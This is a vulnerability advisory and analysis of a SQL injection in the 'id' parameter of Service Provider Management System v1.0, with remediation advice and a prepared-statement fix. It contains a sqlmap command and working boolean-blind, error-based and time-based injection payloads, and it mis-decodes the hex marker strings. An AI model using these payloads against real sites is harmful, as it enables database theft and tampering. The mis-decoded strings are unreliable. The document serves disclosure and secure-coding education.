Service Provider Management System v1.0 - SQL Injection

Exploit Author: ASHIK KUNJUMON Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-05-24 
# Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
# Version: 1.0
# Tested on: Windows/Linux

1. Description:

Service Provider Management System v1.0 allows SQL Injection via ID
parameter in /php-spms/?page=services/view&id=2
Exploiting this issue could allow an attacker to compromise the
application, access or modify data,
or exploit the latest vulnerabilities in the underlying database.

Endpoint: /php-spms/?page=services/view&id=2

Vulnerable parameter: id (GET)

2. Proof of Concept:
----------------------

Step 1 - By visiting the url:
http://localhost/php-spms/?page=services/view&id=2 just add single quote to
verify the SQL Injection.
Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
-p id --dbms=mysql

SQLMap Response:
----------------------
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
COUNT(*),CONCAT(0x7178717171,(SELECT
(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM
(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT


Service Provider Management System v1.0 – SQL Injection Vulnerability Analysis

SQL injection remains one of the most prevalent and dangerous web application vulnerabilities, particularly in legacy systems built with minimal security controls. The Service Provider Management System v1.0, a PHP-based application available on SourceCodester, exemplifies how inadequate input validation can expose critical data and enable full system compromise.

Overview of the Vulnerability

The application, designed for managing service providers, allows users to view service details via a URL parameter: /php-spms/?page=services/view&id=2. The id parameter is directly used in a SQL query without proper sanitization, making it a prime target for SQL injection attacks.

Exploits were confirmed by Ashik Kunjumon on May 23, 2023, and verified using automated tools like sqlmap. This vulnerability is classified as high severity due to its potential to extract sensitive data, modify records, or even escalate to full database access.

Proof of Concept: Demonstrating the Injection

Attackers can begin by simply appending a single quote (') to the id parameter:

http://localhost/php-spms/?page=services/view&id=2'

Upon submission, the server responds with an error message such as:

SQL syntax error near '2''

This confirms that the input is directly embedded into the SQL query without escaping, indicating a clear injection point.

Exploitation Techniques Identified by sqlmap

Using sqlmap with the target URL and specifying the id parameter, three distinct exploitation techniques were detected:

  • Boolean-based blind: The attacker uses conditional statements like AND 8462=8462 to determine whether the query returns a true or false result. This allows inference of data without direct output.
  • Error-based: Exploits MySQL’s FLOOR() function to trigger errors that leak information. For example:
page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

This payload forces MySQL to generate an error containing the string qxqxqxq and qvxdbq, which are derived from hex-encoded values. These can be used to extract database version, user names, or table names.

  • Time-based blind: Uses SLEEP(5) to delay the response. If the server takes 5 seconds to respond, the attacker knows the condition is true. This is useful when no direct output is available.
page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

This technique is especially effective in environments where error messages are suppressed.

Impact and Risk Assessment

Due to the lack of input validation, an attacker can:

  • Extract all service records, including sensitive customer data.
  • Modify or delete service entries by crafting malicious queries.
  • Access database metadata such as table names, column structures, and user credentials.
  • Perform privilege escalation by injecting commands that modify user roles.

Moreover, the system’s reliance on MySQL suggests that attackers could leverage known vulnerabilities (e.g., SQL injection via UNION attacks) to execute arbitrary commands if the database allows it.

Recommended Remediation Strategies

Developers and administrators must implement the following security measures:

  • Use Prepared Statements (Parameterized Queries): Replace direct SQL concatenation with parameterized queries to prevent injection.
  • Input Validation and Sanitization: Ensure that id is validated as an integer before use.
  • Implement Role-Based Access Control: Restrict access to service details based on user permissions.
  • Use Web Application Firewalls (WAF): Deploy WAFs like ModSecurity to detect and block SQL injection attempts.
  • Regular Security Audits: Conduct penetration testing and code reviews to identify vulnerabilities early.

Example: Secure Code Implementation

Here is a corrected version of the vulnerable code using prepared statements in PHP:


<?php
// Vulnerable code (original)
$query = "SELECT * FROM services WHERE id = $_GET['id']";

// Secure implementation using PDO
try {
    $pdo = new PDO("mysql:host=localhost;dbname=spms", "user", "pass");
    $stmt = $pdo->prepare("SELECT * FROM services WHERE id = ?");
    $stmt->execute([$_GET['id']]);
    $result = $stmt->fetchAll();
} catch (PDOException $e) {
    error_log("Database error: " . $e->getMessage());
}
?>

This implementation ensures that user input is treated as a parameter, not part of the SQL command. The database engine handles the data safely, preventing injection.

Conclusion

The Service Provider Management System v1.0 serves as a cautionary tale for developers relying on outdated or poorly secured frameworks. SQL injection is not just a theoretical risk—it is a real, actionable threat capable of compromising entire systems.

By understanding the mechanics of injection, using tools like sqlmap for detection, and applying secure coding practices, organizations can prevent exploitation and maintain data integrity. Security should never be an afterthought—it must be integrated from the start.